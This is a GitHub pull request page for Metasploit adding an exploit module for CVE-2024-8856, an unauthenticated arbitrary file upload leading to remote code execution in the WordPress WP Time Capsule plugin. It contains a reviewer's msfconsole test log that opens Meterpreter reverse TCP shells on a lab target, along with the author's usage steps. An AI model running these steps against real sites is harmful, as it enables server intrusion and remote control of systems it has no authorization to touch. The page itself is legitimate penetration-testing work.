-
Notifications
You must be signed in to change notification settings - Fork 14.1k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Add exploit module for CVE-2024-8856 - WP Time Capsule RCE #19713
Add exploit module for CVE-2024-8856 - WP Time Capsule RCE #19713
Conversation
documentation/modules/exploit/multi/http/wp_time_capsule_file_upload_rce.md
Outdated
Show resolved
Hide resolved
Co-authored-by: Julien Voisin <[email protected]>
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Great work @Chocapikk! One tiny suggestion. Testing was as expected 🚀
Testing
ARCH_PHP
msf6 > use wp_time
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/wp_time_capsule_file_upload_rce 2024-11-15 excellent Yes WordPress WP Time Capsule Arbitrary File Upload to RCE
1 \_ target: PHP In-Memory . . . .
2 \_ target: Unix/Linux Command Shell . . . .
3 \_ target: Windows Command Shell . . . .
Interact with a module by name or index. For example info 3, use 3 or use exploit/multi/http/wp_time_capsule_file_upload_rce
After interacting with a module you can manually set a TARGET with set TARGET 'Windows Command Shell'
[*] Using exploit/multi/http/wp_time_capsule_file_upload_rce
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_time_capsule_file_upload_rce) > use 1
[*] Additionally setting TARGET => PHP In-Memory
msf6 exploit(multi/http/wp_time_capsule_file_upload_rce) > set rhost 172.16.199.158
rhost => 172.16.199.158
msf6 exploit(multi/http/wp_time_capsule_file_upload_rce) > set lhost 172.16.199.158
lhost => 172.16.199.158
msf6 exploit(multi/http/wp_time_capsule_file_upload_rce) > set rport 5555
rport => 5555
msf6 exploit(multi/http/wp_time_capsule_file_upload_rce) > run
[*] Started reverse TCP handler on 172.16.199.158:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. WP Time Capsule plugin appears to be vulnerable.
[*] Sending stage (40004 bytes) to 172.24.0.3
[+] Deleted YY.php
[*] Meterpreter session 1 opened (172.16.199.158:4444 -> 172.24.0.3:51180) at 2024-12-12 15:56:54 -0900
meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer : d41b5b7f71e1
OS : Linux d41b5b7f71e1 5.15.0-125-generic #135~20.04.1-Ubuntu SMP Mon Oct 7 13:56:22 UTC 2024 x86_64
Meterpreter : php/linux
meterpreter > exit
ARCH_CMD
msf6 exploit(multi/http/wp_time_capsule_file_upload_rce) > set target 1
target => 1
msf6 exploit(multi/http/wp_time_capsule_file_upload_rce) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_time_capsule_file_upload_rce) > run
[*] Started reverse TCP handler on 172.16.199.158:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. WP Time Capsule plugin appears to be vulnerable.
[*] Sending stage (3045380 bytes) to 172.24.0.3
[+] Deleted z5.php
[*] Meterpreter session 2 opened (172.16.199.158:4444 -> 172.24.0.3:45764) at 2024-12-12 15:58:51 -0900
meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer : 172.24.0.3
OS : Debian 11.8 (Linux 5.15.0-125-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > exit
Release NotesThis exploits a Remote Code Execution (RCE) vulnerability identified as CVE-2024-8856 in the WordPress WP Time Capsule plugin (versions ≤ 1.22.21). This vulnerability allows unauthenticated attackers to upload and execute arbitrary files due to improper validation within the plugin. |
Hello Metasploit Team,
I have developed a new Metasploit module that exploits a Remote Code Execution (RCE) vulnerability identified as CVE-2024-8856 in the WordPress WP Time Capsule plugin (versions ≤ 1.22.21). This vulnerability allows unauthenticated attackers to upload and execute arbitrary files due to improper validation within the plugin.
Over 20,000 active installations
msfconsole
use exploit/multi/http/wp_time_capsule_file_upload_rce
RHOSTS
to the target IP addressTARGETURI
to the WordPress installation pathPAYLOAD
(e.g.,php/meterpreter/reverse_tcp
)LHOST
andLPORT
for the payloadexploit
Thank you for your consideration.